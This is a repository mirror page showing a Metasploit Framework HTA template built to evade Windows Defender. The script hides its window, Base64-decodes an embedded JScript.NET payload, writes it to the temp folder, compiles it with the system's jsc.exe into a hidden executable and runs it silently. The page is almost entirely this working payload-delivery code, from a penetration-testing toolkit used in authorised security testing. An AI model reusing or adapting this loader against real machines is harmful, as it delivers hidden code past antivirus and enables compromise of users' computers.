github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-09 04:26:11 +02:00
Code Releases Activity
df111afb06
metasploit-framework/data/exploits/hta_evasion.hta
amaloteaux f8ad47d475 improve windows_defender_js_hta : 
-add platform detection for jsc
-prevent cmd prompt when launching jsc
2018-10-11 17:38:47 +02:00

152 lines
3.8 KiB
HTML
Raw Blame History

<html>
<head>
<HTA:APPLICATION WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" />
</head>
</html>
<script>
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
// Base64 implementation found on http://www.webtoolkit.info/javascript-base64.html
// variable names changed to make obfuscation easier
var Base64 = {
// private property
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
// public method for decoding
decode : function (input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
while (i < input.length) {
enc1 = this._keyStr.indexOf(input.charAt(i++));
enc2 = this._keyStr.indexOf(input.charAt(i++));
enc3 = this._keyStr.indexOf(input.charAt(i++));
enc4 = this._keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
output = Base64._utf8_decode(output);
return output;
},
_utf8_decode : function (utftext) {
var string = "";
var input_idx = 0;
var chr1 = 0;
var chr2 = 0;
var chr3 = 0;
while ( input_idx < utftext.length ) {
chr1 = utftext.charCodeAt(input_idx);
if (chr1 < 128) {
string += String.fromCharCode(chr1);
input_idx++;
}
else if((chr1 > 191) && (chr1 < 224)) {
chr2 = utftext.charCodeAt(input_idx+1);
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
input_idx += 2;
} else {
chr2 = utftext.charCodeAt(input_idx+1);
chr3 = utftext.charCodeAt(input_idx+2);
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
input_idx += 3;
}
}
return string;
}
};
decodedStr = Base64.decode("<%= jsnet_encoded %>");
function getTempPath()
{
var TemporaryFolder = 2;
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tempPath = fso.GetSpecialFolder(TemporaryFolder);
return tempPath;
}
var path = getTempPath();
function makefile()
{
var fso = new ActiveXObject("Scripting.FileSystemObject");
var thefile = fso.CreateTextFile(path + "\\\\<%= fname %>.js", true);
thefile.WriteLine(decodedStr);
thefile.Close();
}
makefile();
function findJSC()
{
var fso = new ActiveXObject("Scripting.FileSystemObject");
var comPath = "C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\";
var jscPath = "";
if(!fso.FolderExists(comPath))
{
return false;
}
var frameFolder = fso.GetFolder(comPath);
var fEnum = new Enumerator(frameFolder.SubFolders);
while(!fEnum.atEnd())
{
jscPath = fEnum.item().Path;
if(fso.FileExists(jscPath + "\\\\jsc.exe"))
{
return jscPath + "\\\\jsc.exe";
}
fEnum.moveNext();
}
return false;
}
var comPath = findJSC();
if(comPath)
{
var fso = new ActiveXObject("Scripting.FileSystemObject");
var objShell = new ActiveXObject("WScript.shell");
var js_f = path + "\\\\<%= fname %>.js";
var ex = path + "\\\\<%= fname %>.exe";
var platform = "/platform:<%= arch %>";
objShell.run(comPath + " /out:" + ex + " " + platform + " /t:winexe "+ js_f, 0);
while(!fso.FileExists(ex)) { }
objShell.run(ex, 0);
}
</script>
View Git Blame Copy Permalink